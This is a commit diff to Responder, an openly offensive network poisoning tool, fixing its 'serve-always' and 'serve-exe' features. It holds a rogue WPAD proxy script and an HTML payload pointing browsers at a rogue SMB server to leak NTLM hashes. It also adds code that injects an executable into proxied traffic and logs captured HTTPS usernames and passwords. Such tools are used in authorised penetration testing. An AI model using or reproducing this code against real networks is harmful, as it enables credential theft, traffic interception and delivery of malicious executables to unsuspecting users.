Fixed serve-always and serve-exe with the new WPAD server.

Responder.conf

@@ -45,10 +45,8 @@ ExecFilename = FixInternet.exe
 WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
 ;
 ;HTML answer to inject.
-;In this example, we redirect the browser to our rogue SMB server. Please consider the "RespProxySrv" string when modifying, it is used in conjunction with WPADScript so no proxy will be used for this host.
-;Also, the HTML has to be in this format "<html> Payload goes here...</html>".
+;In this example, we redirect the browser to our rogue SMB server. Please consider the "RespProxySrv" string when modifying, it is used in conjunction with WPADScript so no proxy will be used for this host.Also, the HTML has to be in this format "<html> Payload goes here...</html>".
 HTMLToServe = <html><head></head><body><img src='file:\\\\\RespProxySrv\ssed\seyad.ico' alt='Loading' height='1' width='2'></body></html> 
-;
 [HTTPS Server]
 ;
 ;Change to use your certs

Responder.py

@@ -79,6 +79,7 @@ Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
 Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
 FILENAME = config.get('HTTP Server', 'Filename')
 WPAD_Script = config.get('HTTP Server', 'WPADScript')
+HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
 RespondTo = config.get('Responder Core', 'RespondTo').strip()
 RespondTo.split(",")
 RespondToName = config.get('Responder Core', 'RespondToName').strip()
@@ -96,6 +97,9 @@ Verbose = options.Verbose
 Force_WPAD_Auth = options.Force_WPAD_Auth
 AnalyzeMode = options.Analyse
 
+if HTMLToServe == None:
+    HTMLToServe = ''
+
 if INTERFACE != "Not set":
     BIND_TO_Interface = INTERFACE
 
@@ -130,9 +134,11 @@ def Analyze(AnalyzeMode):
         return False
 
 #Logger
+CommandLine = str(sys.argv)
 import logging
 logging.basicConfig(filename=str(os.path.join(ResponderPATH,SessionLog)),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
-logging.warning('Responder Started')
+StartMessage = 'Responder Started\nCommand line args:%s' %(CommandLine)
+logging.warning(StartMessage)
 
 Log2Filename = str(os.path.join(ResponderPATH,"LLMNR-NBT-NS.log"))
 logger2 = logging.getLogger('LLMNR/NBT-NS')
@@ -1615,7 +1621,6 @@ def Basic_Ntlm(Basic):
 
 def ServeEXE(data,client, Filename):
     Message = "[+]Sent %s file sent to: %s."%(Filename,client)
-    print Message
     logging.warning(Message)
     with open (Filename, "rb") as bk:
         data = bk.read()
@@ -1702,7 +1707,7 @@ def PacketSequence(data,client):
                 buffer1 = WpadCustom(data,client)
                 return buffer1
             else:
-                buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
+                buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
                 buffer1.calculate()
                 return str(buffer1)
 
@@ -1722,7 +1727,7 @@ def PacketSequence(data,client):
             buffer1 = WpadCustom(data,client)
             return buffer1
         else:
-            buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
+            buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
             buffer1.calculate()
             return str(buffer1)
 
@@ -1776,8 +1781,21 @@ def HandleGzip(Headers, Content, Payload):
     else:
         return False
 
+def InjectPage(data, client):
+    if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
+        if IsExecutable(FILENAME):
+            buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
+            buffer1.calculate()
+            return str(buffer1)
+        else:
+            buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
+            buffer1.calculate()
+            return str(buffer1)
+    else:
+        return False
+
 def InjectData(data):
-    Payload = config.get('HTTP Server','HTMLToServe')
+    Payload = HTMLToServe
     if len(data.split('\r\n\r\n'))>1:
         try:
             Headers, Content = data.split('\r\n\r\n')
@@ -1904,8 +1922,10 @@ class ProxyHandler (BaseHTTPServer.BaseHTTPRequestHandler):
                     if i is soc:
                         out = self.connection
                         try:
-                            if len(config.get('HTTP Server','HTMLToServe'))>5:
+                            if len(HTMLToServe)>5:
                                 data = InjectData(i.recv(8192))
+                            if InjectPage(i.recv(8192),self.client_address[0]):
+                                data = InjectPage(i.recv(8192),self.client_address[0])
                             else:
                                 data = i.recv(8192)
                         except:
@@ -2009,7 +2029,7 @@ def HTTPSPacketSequence(data,client):
         if packetNtlm == "\x03":
             NTLM_Auth= b64decode(''.join(a))
             ParseHTTPSHash(NTLM_Auth,client)
-            buffer1 = str(IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')))
+            buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe))
             return buffer1
     if b:
         GrabCookie(data,client)
@@ -2017,7 +2037,7 @@ def HTTPSPacketSequence(data,client):
         WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
         print "[+]HTTPS-User & Password:", b64decode(''.join(b))
         logging.warning('[+]HTTPS-User & Password: %s'%(b64decode(''.join(b))))
-        buffer1 = str(IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')))
+        buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe))
         return buffer1
 
     else:
@@ -2521,3 +2541,4 @@ if __name__ == '__main__':
     except:
         raise
 
+